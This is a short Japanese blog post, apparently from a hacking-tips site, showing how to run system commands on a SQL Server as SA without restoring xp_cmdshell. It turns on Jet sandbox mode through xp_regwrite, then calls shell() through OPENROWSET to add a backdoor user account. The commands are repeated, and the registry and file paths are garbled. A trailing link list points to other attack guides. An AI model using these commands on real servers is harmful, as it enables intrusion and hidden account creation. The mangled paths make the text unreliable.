SA サンドボックスモードで xp_cmdshell と xplog70.dll をリストアせずにコマンドを実行する。
2022-01-01 20:18:07
まずサンドボックスモードを開きます。
exec master...xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoft³³³³³³Engines','SandBoxMode','REG_DWORD',1
次に、jet.ledb を使ってシステムコマンドを実行します。
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windowssystem32ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
exec master...xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoft³³³³³³Engines','SandBoxMode','REG_DWORD',1
次に、jet.ledb を使ってシステムコマンドを実行します。
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windowssystem32ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
関連
-
よくあるウェブ攻撃について解説
-
優れたWebログセキュリティ解析ツール10選 おすすめまとめ
-
他人のQQチャット記録を確認する方法を調べる方法 QQチャット記録を確認する詳細な方法?
-
QQは、履歴を削除する方法簡単な方法を復元するためにチャット
-
PHPSHELLがまた新しくなりました
-
asp cer cdx htrファイルのアップロードを許可しないサイトでの解決策!
-
Wind Newsletter 4.0の未公開バグについて
-
Sql2005インジェクションアシストスクリプト[修正版]について
-
サーブユーが管理者パスワードを入手する新手口(スピン)
-
Dでよく使われるインジェクションコマンドをいくつかまとめてみました。
最新
-
nginxです。[emerg] 0.0.0.0:80 への bind() に失敗しました (98: アドレスは既に使用中です)
-
htmlページでギリシャ文字を使うには
-
ピュアhtml+cssでの要素読み込み効果
-
純粋なhtml + cssで五輪を実現するサンプルコード
-
ナビゲーションバー・ドロップダウンメニューのHTML+CSSサンプルコード
-
タイピング効果を実現するピュアhtml+css
-
htmlの選択ボックスのプレースホルダー作成に関する質問
-
html css3 伸縮しない 画像表示効果
-
トップナビゲーションバーメニュー作成用HTML+CSS
-
html+css 実装 サイバーパンク風ボタン
おすすめ
-
JSとC#それぞれのアンチインジェクションコード
-
広告コードをrm形式で挿入
-
mysql5 インジェクションの脆弱性
-
ASP、PHP、.NETのHTTP-REFERERの偽造方法と偽造REFERERを防止するための方法
-
WebサイトにおけるInvisible Bomb eWebEditorのファイルアップロードの脆弱性に対するパッチについて
-
ASPインジェクションの手法を網羅的に理解する【収録概要
-
潜入でopenrowsetでシェルを取得する方法
-
Wish poolプラグインリモートコンテナの脆弱性
-
Macでmitmproxyを使ってHTTPSのデータを取得する方法
-
コンピュータが他人に操作されるのを防ぐ